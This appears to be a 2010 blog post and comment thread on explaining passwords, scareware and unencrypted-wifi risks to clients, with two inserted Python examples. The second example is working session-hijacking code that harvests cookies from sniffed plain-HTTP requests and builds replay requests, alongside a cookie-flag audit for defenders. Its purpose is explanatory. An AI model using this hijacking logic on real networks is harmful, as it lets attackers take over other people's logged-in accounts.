What to Tell Clients About Security

Posted by on Dec 27, 2010 | 3 Comments

Here is a puzzle presented to me by a senior client. She was bothered by the necessity of logging on to Gmail. She wanted to simply open her browser and have immediate access to her mail. She had seen me do just that and wondered how to do it.

That got me thinking about security in general for sites that require a user ID and password. Browsers will kindly offer to remember the login for you, but that is an obvious hazard: anyone who sits down at the unlocked machine can use the saved credentials, and some browsers will show the stored passwords in plain text from their settings page unless a master password protects them. Even the asterisks in a password field give something away, since an onlooker can count them and guess that eight characters might be a date or similar.

How concerned should we be? On one hand, we can accept that there is no privacy on the Internet; on the other, we still want to buy things online without having our bank account or credit card raided.

What is privacy? People interviewed for a job are now routinely asked to discuss their Facebook page as part of the process. That can surprise someone who assumed what they posted there was separate from other concerns.

What is security? The day before Christmas I almost got an unexpected present from scareware. While I was searching for a manual for my wife's Timex watch, a popup window announced that AV8 had just found some suspicious activity; all I had to do was click here and they would fix it. There is no AV8 installed on that computer. If this ever happens to you, do not click the X button to close the offender: the "window" is a web page drawn to look like a dialog, and its close button is just another link the attacker controls. Either reboot immediately or kill the browser from the task manager.

The point is that in this type of attack, security resides in knowledge, not software. Some software could limit the damage, but think of it as a series of barriers the bad guys must get through to harm your computer, and knowledge is the first barrier. Also, this last attack did not come from an obviously questionable site; it was not associated with either porn or piracy.

So what is your comfort level on passwords, user IDs, anti-malware techniques and software? Would you suggest different procedures for less well-versed clients?

  • http://visuex.com Michael Tunnell

    I have auto-generated passwords, so all of my passwords are different for every site and are random numbers, letters and symbols. So knowing me would basically do nothing for someone trying to guess my passwords.

    However, in my opinion, if someone gets physical access to my computer then security basically means nothing, because when that happens the person pretty much has full rein.

    So keeping your passwords in your browser or in a service like LastPass isn't an issue as long as you keep them different and keep your computer up to date.

    For clients, though, it is hard to explain most of that to them. I pretty much do my best and test the waters as to what they are willing to do... that is about all you can do, because even when you try to explain things it can just be a lost cause if they refuse to do it.
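
Added example, not code from the post or from any commenter: the "different random password for every site" practice Michael describes, done with the operating system's CSPRNG through Python's `secrets` module rather than the `random` module, whose generator is predictable once a few outputs have been observed. The character set, the 20-character default and the "one of each class" rule are my assumptions, not anything the post specifies; the site names are placeholders.

```python
import math
import secrets
import string

# Character classes; the symbol set is an assumption, not anything the post specifies.
LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits
SYMBOLS = "!@#$%^&*()-_=+[]{};:,.?"
ALPHABET = LOWER + UPPER + DIGITS + SYMBOLS


def entropy_bits(length, alphabet=ALPHABET):
    """Entropy, in bits, of `length` characters drawn uniformly from `alphabet`.
    This is the figure that matters against offline guessing; 20 characters
    from these 85 symbols is about 128 bits."""
    return length * math.log2(len(alphabet))


def has_all_classes(pw):
    """True if the password contains at least one lower, upper, digit and symbol."""
    return all(any(c in cls for c in pw) for cls in (LOWER, UPPER, DIGITS, SYMBOLS))


def generate_password(length=20, alphabet=ALPHABET):
    """Draw each character with the OS CSPRNG via `secrets`, never `random`.
    Candidates missing a class are redrawn so that sites with composition
    rules accept the result; at this length very few candidates are rejected,
    so the entropy stays close to entropy_bits(length)."""
    if length < 4:
        raise ValueError("need room for one character of each class")
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        if has_all_classes(pw):
            return pw


def site_passwords(sites, length=20):
    """An independent password per site, so one leaked site reveals nothing
    about the others (Michael's point that knowing him is useless to a guesser)."""
    return {site: generate_password(length) for site in sites}


if __name__ == "__main__":
    # Placeholder site names; output differs on every run.
    for site, pw in site_passwords(["webmail.example", "bank.example"]).items():
        print(f"{site}: {pw}  ({entropy_bits(len(pw)):.0f} bits)")
```

Whether these land in the browser's store, LastPass or a file, the thing to keep in mind is that the store itself is now the secret: it should be encrypted under a master password or kept off the machine, which is the point spookie raises below.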

  • spookie

    I disagree with Michael that physical access necessarily means a person has free rein. I say necessarily because, while I am utterly familiar with security on my computers (Mac, Windows and Linux), I don't always do what I know I should. I use secure passwords. I don't save passwords, I allow only session cookies, and I dump all caches, cookies and history when I close my browser. I even specifically use SSL at every site I can; I even use Encrypted Google. But remembering all those secure passwords? Not so much. Unfortunately that means saving the passwords in a cleartext file on the drive. (I know, I know!) So having physical access to my computer would give one access, but only because I'm stupid. If I encrypted that password file, or kept it separate from the computer...

    My concern with auto-logging in is that it opens up all those accounts when using unencrypted wifi. I have run Firesheep in several coffee shops, just to see how big a problem this is, and I have seen people who had 8 or more accounts I could access. Now, I doubt they were actively accessing all those sites. They were just auto-logged on.

    How do I explain this? Well, if possible, these days I show them. Among other things, Firesheep makes a h&11 of an impression.
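
Added example, not code from the post and not Firesheep's own source, showing what the passive sniffing spookie describes actually collects: every plain-HTTP request from an auto-logged-in browser carries its session cookie in the clear, so anyone on the same open network who reads it can replay it. The captured requests, hostnames and cookie names are constructed; the per-site table of which cookie is the login cookie stands in for the site handlers Firesheep shipped with. The last function is the server-side check a site owner would want: a session cookie marked Secure is never sent over plain HTTP, which (together with site-wide HTTPS) is what closes the leak.

```python
# Constructed sample of what a sniffer sees on the wire (one HTTP request each).
CAPTURED_REQUESTS = [
    b"GET /inbox HTTP/1.1\r\nHost: webmail.example\r\n"
    b"Cookie: lang=en; SID=2c7e1f9a4b3d8e0c; theme=dark\r\n\r\n",
    b"GET /feed HTTP/1.1\r\nHost: social.example\r\n"
    b"Cookie: sessionid=7d1b8a9e5f2c3a4b; tz=-5\r\n\r\n",
    b"GET /docs HTTP/1.1\r\nHost: wiki.example\r\n"
    b"Cookie: tracker=abc123\r\n\r\n",  # no known session cookie: nothing to take
]

# Which cookie carries the login for which site.  Firesheep shipped a handler
# per supported site with this information; these entries are hypothetical.
SESSION_COOKIE_NAMES = {
    "webmail.example": "SID",
    "social.example": "sessionid",
}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(cookie_header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def harvest_sessions(raw_requests, session_names=SESSION_COOKIE_NAMES):
    """Passive step: collect replayable (host, cookie name, value) triples.
    Nothing is decrypted; the cookie is simply on the wire in cleartext."""
    found = []
    for raw in raw_requests:
        _method, _path, headers = parse_request(raw)
        host = headers.get("host", "")
        name = session_names.get(host)
        if name is None:
            continue
        value = parse_cookies(headers.get("cookie", "")).get(name)
        if value:
            found.append((host, name, value))
    return found


def hijack_request(host, cookie_name, cookie_value, path="/"):
    """Active step: the request an attacker sends to act as the victim.
    No password is involved; the cookie alone is the proof of login."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_name}={cookie_value}\r\n\r\n").encode()


def audit_set_cookie(set_cookie_header):
    """Server-side check.  Secure stops the browser sending the cookie over
    plain HTTP at all, which is what defeats this attack; HttpOnly is a
    separate defence against page scripts reading it.  Returns what is missing."""
    attrs = {a.strip().lower().split("=")[0] for a in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("secure", "httponly") if flag not in attrs]


if __name__ == "__main__":
    for host, name, value in harvest_sessions(CAPTURED_REQUESTS):
        print(f"harvested from {host}: {name}={value}")
        print(hijack_request(host, name, value, "/inbox").decode())
    print(audit_set_cookie("SID=2c7e1f9a4b3d8e0c; Path=/"))
    print(audit_set_cookie("SID=2c7e1f9a4b3d8e0c; Path=/; Secure; HttpOnly"))
```

The demonstration that makes the impression on clients is the first two functions: no cracking, no password, just reading what the laptop volunteers to the room. The last function is what to ask of the site, or what to check on your own sites; the "Encrypted Google" spookie mentions is the client-side way of forcing the same outcome.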

  • spookie

    BTW, how lazy do you have to be to find logging in to Gmail bothersome? I guess if logging in was an issue for her, I'd set her up with an email client.